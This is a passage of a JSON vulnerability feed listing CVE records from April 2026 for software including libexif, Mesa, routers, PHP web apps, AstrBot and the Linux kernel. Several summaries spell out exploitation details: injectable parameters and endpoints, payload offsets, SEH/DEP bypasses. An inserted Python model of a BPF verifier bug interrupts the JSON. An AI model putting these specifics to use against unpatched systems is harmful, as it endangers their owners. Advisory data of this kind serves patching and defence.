The setup of an HTTP/2 session starts with a speculative HTTP/1 transport, and upon upgrading to h2 the HTTP/1 request is repurposed as stream zero. During the upgrade, a buffer allocation is made to reserve space to send frames to the client. This allocation would split the original workspace, and depending on the amount of prefetched data, the next fetch could perform a pipelining operation that would run out of workspace.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.varnish-software.com/security/VEV00002/"],"published_time":"2026-04-12T20:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40385","summary":"In libexif through 0.6.25, an unsigned 32bit integer overflow in Nikon MakerNote handling could be used by local attackers to cause crashes or information leaks. This only affects 32bit systems.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.01922,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/libexif/libexif/commit/93003b93e50b3d259bd2227d8775b73a53c35d58"],"published_time":"2026-04-12T19:16:20","vendor":"libexif_project","product":"libexif","version":null},{"cve_id":"CVE-2026-40386","summary":"In libexif through 0.6.25, an integer underflow in size checking for Fuji and Olympus MakerNote decoding could be used by attackers to crash or leak information out of libexif-using 
programs.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.01922,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/libexif/libexif/commit/dc6eac6e9655d14d0779d99e82d0f5f442d2f34b"],"published_time":"2026-04-12T19:16:20","vendor":"libexif_project","product":"libexif","version":null},{"cve_id":"CVE-2026-40393","summary":"In Mesa before 25.3.6 and 26 before 26.0.1, out-of-bounds memory access can occur in WebGPU because the amount of to-be-allocated data depends on an untrusted party, and is then used for alloca.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00043,"ranking_epss":0.12876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/39866","https://lists.freedesktop.org/archives/mesa-dev/2026-February/226597.html"],"published_time":"2026-04-12T19:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25710","summary":"Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. 
Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.","cvss":8.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":8.8,"epss":0.0003,"ranking_epss":0.08491,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip","https://www.dolibarr.org/","https://www.exploit-db.com/exploits/46095","https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25711","summary":"SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":6.9,"epss":0.0002,"ranking_epss":0.05285,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46088","https://www.vulncheck.com/advisories/spotftp-password-recover-denial-of-service-via-name-field"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25712","summary":"BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. 
Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":6.9,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46087","https://www.vulncheck.com/advisories/blueauditor-buffer-overflow-denial-of-service-via-registration-key"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25713","summary":"MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://manageyourteam.net/","https://sourceforge.net/projects/myt/","https://www.exploit-db.com/exploits/46084","https://www.vulncheck.com/advisories/myt-pm-sql-injection-via-charge-group-total-parameter"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25703","summary":"ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. 
Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.impresscms.org/","https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip","https://www.exploit-db.com/exploits/46239","https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-parameter"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25705","summary":"Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://initd.sh/","https://sourceforge.net/projects/echomirage.oldbutgold.p/","https://www.exploit-db.com/exploits/46216","https://www.vulncheck.com/advisories/echo-mirage-stack-buffer-overflow-via-rules-action-field"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25706","summary":"Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. 
Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":8.7,"epss":0.00121,"ranking_epss":0.31177,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.ac.i8i.ir/","https://www.exploit-db.com/exploits/46132","https://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-file-disclosure"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25707","summary":"eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://ebrigade.net/","https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip","https://www.exploit-db.com/exploits/46117","https://www.vulncheck.com/advisories/ebrigade-erp-sql-injection-via-pdf-php"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25708","summary":"Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vulnerability that allows attackers to change administrator credentials by tricking authenticated users into submitting malicious requests. 
Attackers can craft HTML forms targeting the networkSetup.htm endpoint with parameters usnm, usps, and cfps to modify the admin username and password without user consent.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00014,"ranking_epss":0.02686,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46100","https://www.vulncheck.com/advisories/heatmiser-wifi-thermostat-cross-site-request-forgery"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25709","summary":"CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00058,"ranking_epss":0.18103,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://forum.codefuture.co.uk/showthread.php?tid=73141","https://davidtavarez.github.io/","https://www.exploit-db.com/exploits/46094","https://www.vulncheck.com/advisories/cf-image-hosting-script-unauthorized-database-access"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25691","summary":"Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. 
Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46269","https://www.faleemi.com/","https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25693","summary":"ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00013,"ranking_epss":0.02227,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46274","https://www.resourcespace.com/","https://www.resourcespace.com/get","https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25695","summary":"R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. 
Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02013,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cloud.r-project.org/bin/windows/","https://www.exploit-db.com/exploits/46265","https://www.vulncheck.com/advisories/r-local-buffer-overflow-windows-xp-sp3"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25697","summary":"CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials.","cvss":8.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":8.8,"epss":0.00065,"ranking_epss":0.20154,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/VictorAlagwu/CMSsite/archive/master.zip","https://www.exploit-db.com/exploits/46259","https://www.vulncheck.com/advisories/cmssite-sql-injection-via-category-php"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25699","summary":"Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. 
Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://newsbull.org/","https://github.com/gurkanuzunca/newsbull","https://www.exploit-db.com/exploits/46266","https://www.vulncheck.com/advisories/newsbull-haber-script-authenticated-sql-injection-via-search-parameter"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25701","summary":"Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.divxtodvd.net/","http://www.divxtodvd.net/easy_video_to_ipod.exe","https://www.exploit-db.com/exploits/46255","https://www.vulncheck.com/advisories/easy-video-to-ipod-converter-local-buffer-overflow-seh"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2018-25257","summary":"Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. 
Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46217","https://www.vulncheck.com/advisories/adianti-framework-and-sql-injection-via-profile"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2018-25258","summary":"RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe","https://www.exploit-db.com/exploits/46107","https://www.r-project.org/","https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25689","summary":"HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. 
Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.html5videoplayer.net/download.html","https://www.exploit-db.com/exploits/46279","https://www.vulncheck.com/advisories/html5-video-player-local-buffer-overflow-non-seh"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2017-20239","summary":"MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":5.1,"epss":0.00036,"ranking_epss":0.10732,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46097","https://www.vulncheck.com/advisories/mdwiki-cross-site-scripting-via-location-hash-parameter"],"published_time":"2026-04-12T13:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6126","summary":"A weakness has been identified in zhayujie chatgpt-on-wechat CowAgent 2.0.4. The affected element is an unknown function of the component Administrative HTTP Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. 
The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00073,"ranking_epss":0.22136,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/issues/2733","https://github.com/zhayujie/chatgpt-on-wechat/issues/2733#issue-4177804035","https://vuldb.com/submit/793554","https://vuldb.com/submit/795335","https://vuldb.com/vuln/356990","https://vuldb.com/vuln/356990/cti"],"published_time":"2026-04-12T11:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6125","summary":"A security flaw has been discovered in Dromara warm-flow up to 1.8.4. Impacted is the function SpelHelper.parseExpression of the file /warm-flow/save-json of the component Workflow Definition Handler. The manipulation of the argument listenerPath/skipCondition/permissionFlag results in code injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00044,"ranking_epss":0.13243,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitee.com/dromara/warm-flow/","https://gitee.com/dromara/warm-flow/issues/IHURVQ","https://vuldb.com/submit/793322","https://vuldb.com/vuln/356989","https://vuldb.com/vuln/356989/cti"],"published_time":"2026-04-12T10:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6124","summary":"A vulnerability was determined in Tenda F451 1.0.0.7. This vulnerability affects the function fromSafeMacFilter of the file /goform/SafeMacFilter of the component httpd. Executing a manipulation of the argument page/menufacturer can lead to stack-based buffer overflow. The attack can be executed remotely. 
The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/16","https://vuldb.com/submit/792874","https://vuldb.com/vuln/356987","https://vuldb.com/vuln/356987/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T09:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6123","summary":"A vulnerability was found in Tenda F451 1.0.0.7. This affects the function fromAddressNat of the file /goform/addressNat of the component httpd. Performing a manipulation of the argument entrys results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00088,"ranking_epss":0.25077,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/15","https://vuldb.com/submit/792873","https://vuldb.com/submit/792879","https://vuldb.com/vuln/356986","https://vuldb.com/vuln/356986/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T09:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6122","summary":"A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. 
The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/14","https://vuldb.com/submit/792872","https://vuldb.com/vuln/356985","https://vuldb.com/vuln/356985/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T08:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6121","summary":"A flaw has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function WrlclientSet of the file /goform/WrlclientSet of the component httpd. This manipulation of the argument GO causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/12","https://vuldb.com/submit/792865","https://vuldb.com/vuln/356984","https://vuldb.com/vuln/356984/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T08:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6120","summary":"A vulnerability was detected in Tenda F451 1.0.0.7. Affected is the function fromDhcpListClient of the file /goform/DhcpListClient of the component httpd. The manipulation of the argument page results in stack-based buffer overflow. The attack can be launched remotely. 
The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/11","https://vuldb.com/submit/792864","https://vuldb.com/vuln/356983","https://vuldb.com/vuln/356983/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T06:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6119","summary":"A vulnerability was identified in AstrBotDevs AstrBot up to 4.22.1. The affected element is the function post_data.get of the component API Endpoint. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00012,"ranking_epss":0.01634,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7171","https://vuldb.com/submit/792661","https://vuldb.com/vuln/356979","https://vuldb.com/vuln/356979/cti"],"published_time":"2026-04-12T06:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31413","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR\n\nmaybe_fork_scalars() is called for both BPF_AND and BPF_OR when the\nsource operand is a constant.  
When dst has signed range [-1, 0], it\nforks the verifier state: the pushed path gets dst = 0, the current\npath gets dst = -1.\n\nFor BPF_AND this is correct: 0 & K == 0.\nFor BPF_OR this is wrong:    0 | K == K, not 0.\n\nThe pushed path therefore tracks dst as 0 when the runtime value is K,\nproducing an exploitable verifier/runtime divergence that allows\nout-of-bounds map access.\n\nFix this by passing env->insn_idx (instead of env->insn_idx + 1) to\npush_stack(), so the pushed path re-executes the ALU instruction with\ndst = 0 and naturally computes the correct result for any opcode.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":8e-05,"ranking_epss":0.00648,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4","https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7","https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5","https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455"],"published_time":"2026-04-12T06:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6116","summary":"A vulnerability has been found in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument ip leads to os command injection. Remote exploitation of the attack is possible. 
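The state fork described for CVE-2026-31413 above, as an added example in Python (a toy model written for this page, not kernel code; `fork_pushed_path`, `bounds_check_outcome`, the constant K and the map length are our own names and inputs). It shows why assigning dst = 0 to the pushed path *after* the instruction is sound for BPF_AND but not for BPF_OR, how the resulting verifier/runtime divergence lets a bounds check pass, and why re-executing the ALU instruction on the pushed path (the fix: `push_stack()` with `insn_idx` instead of `insn_idx + 1`) gives the right value for any opcode:

```python
# Added example: a toy model of the maybe_fork_scalars() fork for dst in the
# signed range [-1, 0]. Python ints behave like signed 64-bit scalars for the
# bitwise operations used here. Not kernel code; names are ours.

BPF_AND = "and"
BPF_OR = "or"


def alu(op, dst, k):
    """Runtime semantics of `dst = dst <op> K` for a constant K."""
    if op == BPF_AND:
        return dst & k
    if op == BPF_OR:
        return dst | k
    raise ValueError(op)


def fork_pushed_path(op, k, fixed):
    """Return (tracked, runtime) for the pushed path of the fork.

    Before the fix the pushed state resumed at insn_idx + 1 with dst = 0,
    i.e. the verifier took 0 to be the value *after* the ALU instruction.
    After the fix it resumes at insn_idx, so the instruction is re-executed
    with dst = 0 and the tracked value is whatever the opcode produces."""
    runtime = alu(op, 0, k)            # the machine always computes 0 <op> K
    tracked = alu(op, 0, k) if fixed else 0
    return tracked, runtime


def fork_current_path(op, k):
    """The current path keeps dst = -1 and executes the ALU instruction."""
    value = alu(op, -1, k)
    return value, value


def verifier_runtime_divergence(op, k, fixed):
    """True when the verifier's belief about dst differs from reality."""
    tracked, runtime = fork_pushed_path(op, k, fixed)
    return tracked != runtime


def bounds_check_outcome(op, k, map_len, fixed):
    """Model `if dst < map_len: access map[dst]` on the pushed path.

    Returns (verifier_accepts, runtime_index_in_bounds). The dangerous
    combination is (True, False): the program loads, the access is OOB."""
    tracked, runtime = fork_pushed_path(op, k, fixed)
    verifier_accepts = 0 <= tracked < map_len
    runtime_in_bounds = 0 <= runtime < map_len
    return verifier_accepts, runtime_in_bounds


if __name__ == "__main__":
    for op in (BPF_AND, BPF_OR):
        for fixed in (False, True):
            print(op, "fixed" if fixed else "buggy",
                  "pushed (tracked, runtime) =", fork_pushed_path(op, 0x40, fixed),
                  "bounds check =", bounds_check_outcome(op, 0x40, 16, fixed))
```

With K = 0x40 and a 16-byte map, the buggy BPF_OR fork yields tracked 0 against runtime 0x40, so the check `dst < 16` is accepted by the verifier and violated at runtime; after the fix both paths track the real value and the load is rejected.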
The exploit has been disclosed to the public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_181/README.md","https://vuldb.com/submit/792249","https://vuldb.com/vuln/356976","https://vuldb.com/vuln/356976/cti","https://www.totolink.net/"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6117","summary":"A vulnerability was found in AstrBotDevs AstrBot up to 4.22.1. This issue affects the function install_plugin_upload of the file astrbot/dashboard/routes/plugin.py of the component install-upload Endpoint. The manipulation of the argument File results in sandbox issue. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00039,"ranking_epss":0.11645,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7168","https://vuldb.com/submit/792653","https://vuldb.com/vuln/356977","https://vuldb.com/vuln/356977/cti"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6118","summary":"A vulnerability was determined in AstrBotDevs AstrBot up to 4.22.1. Impacted is the function add_mcp_server of the file astrbot/dashboard/routes/tools.py of the component MCP Endpoint. This manipulation of the argument command causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. 
